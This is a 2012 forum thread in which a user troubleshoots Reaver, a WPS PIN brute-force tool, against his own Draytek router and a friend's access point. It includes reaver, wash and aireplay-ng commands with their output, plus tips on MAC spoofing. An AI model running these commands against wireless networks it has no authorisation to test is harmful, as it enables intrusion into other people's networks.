Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: Help with Reaver

  1. #1
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Help with Reaver

    Hi

    I'm trying to crack my WPS on my Draytek V2110n. I run BT5R2 on my laptop.

    When I run Reaver it fails to associate:

    Code:
    root@bt:~# reaver -i mon0 -b 00:50:7F:AD:28:XX -c 1 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 1
    [+] Waiting for beacon from 00:50:7F:AD:28:XX
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    [!] WARNING: Failed to associate with 00:50:7F:AD:28:XX (ESSID: HairyThePig)
    ^C
    [+] Nothing done, nothing to save.
    I tried pressing the WPS button on my router but it didnt make any difference.

    I tried my a friend's AP breifly, and it started to work, then started failing - possibly a failsafe/WPS hack protection?

    Code:
    root@bt:~# reaver -i mon0 -b C4:3D:C7:43:74:XX -c 11 -vv
    
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Switching mon0 to channel 11
    [?] Restore previous session for C4:3D:C7:43:74:XX? [n/Y] Y     
    [+] Restored previous session
    [+] Waiting for beacon from C4:3D:C7:43:74:XX
    [+] Associated with C4:3D:C7:43:74:XX (ESSID: Shabba)
    [+] Trying pin 11115670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response                                                           
    [+] Received identity request                                                           
    [+] Sending identity response                                                           
    [+] Received M1 message                                                                 
    [+] Sending M2 message                                                                  
    [+] Received M1 message                                                                 
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Any tips?

    EDIT:

    Bit more info.

    Repeated attempts show that sometimes it does associate, but it immediately disassociates again.

    Also:

    Code:
    root@bt:~# wash -i mon0
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    [!] Found packet with bad FCS, skipping...
    Unless I do -C:

    Code:
    root@bt:~# wash -i mon0 -C
    
    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    ---------------------------------------------------------------------------------------------------------------
    00:50:7F:AD:28:XX       1            -38        1.0               No                HairyThePig
    Still stumped!
    Last edited by hongman; 04-20-2012 at 04:25 PM.

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Help with Reaver

    I remember reading somewhere that someone couldn't associate unless he used the -N flag. Maybe you're having the same problem.

  3. #3
    Member shadowzero's Avatar
    Join Date
    Jun 2011
    Location
    ${HOME}
    Posts
    94

    Default Re: Help with Reaver

    Others have found that it's easier if you associate with aireplay-ng first, and then run reaver with -A.

  4. #4
    Member melissabubble's Avatar
    Join Date
    Aug 2011
    Location
    c:\
    Posts
    85

    Default Re: Help with Reaver

    Try entering your mac address with the mac= option. It always work for me cause I spoof my mac. Hope that helps!

  5. #5
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Re: Help with Reaver

    Thanks guys I will give those a go.

    How do I associate with aireplay-ng?

    I did think of spooking my mac - but I thought if I spoofed the MAC of a valid client, the AP wouldnt respond to WPS requests as the client is already connected?

  6. #6
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: Help with Reaver

    associate with aireplay-ng :

    Code:
    aireplay-ng 1 0 -a [mac ap] -h [your mac] [interface]
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  7. #7
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Re: Help with Reaver

    I tried -A and -N but all I get is timeouts.

    Going to have a play, any other suggestions appreciated!

  8. #8
    Member
    Join Date
    Dec 2011
    Posts
    86

    Default Re: Help with Reaver

    try running wireshark and see if you router is ever communicating back. also have you tried to associate using another application before you used -N or -A?

  9. #9
    Member
    Join Date
    Jan 2006
    Posts
    90

    Default Re: Help with Reaver

    I used aireplay to associate before using -A.

    Been doing some looking around and a few people have mentioned draytek's are immune to WPS attacks, so maybe I'm just trying against a device that can never be exploited this way.

    I think I have some spare netgear/dlink AP's in the office, going to have a go with those on Monday!

  10. #10
    Just burned his ISO
    Join Date
    May 2010
    Posts
    10

    Default Re: Help with Reaver

    Did you run "wash" on your router I don't know about drayteks but if it doesn't show up in wash it won't be cracked with reaver. The actiontechs verizon is using now for example can't be cracked with reaver and don't show up in wash. Point being if wash don't detect it reaver wont work on it.

Page 1 of 2 12 LastLast

Similar Threads

  1. Wash not installing with Reaver via Apt-Get
    By joshv06 in forum BackTrack 5 Bugs
    Replies: 1
    Last Post: 03-12-2013, 04:33 PM
  2. Reaver 1.2 WPS Brute Forcer Video and Information
    By MartinBishop in forum BackTrack 5 Videos
    Replies: 3
    Last Post: 03-07-2012, 08:46 AM
  3. Inflator: Reaver Command generator 1.0 release
    By prince_vegeta in forum BackTrack 5 General Topics
    Replies: 1
    Last Post: 01-27-2012, 07:33 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •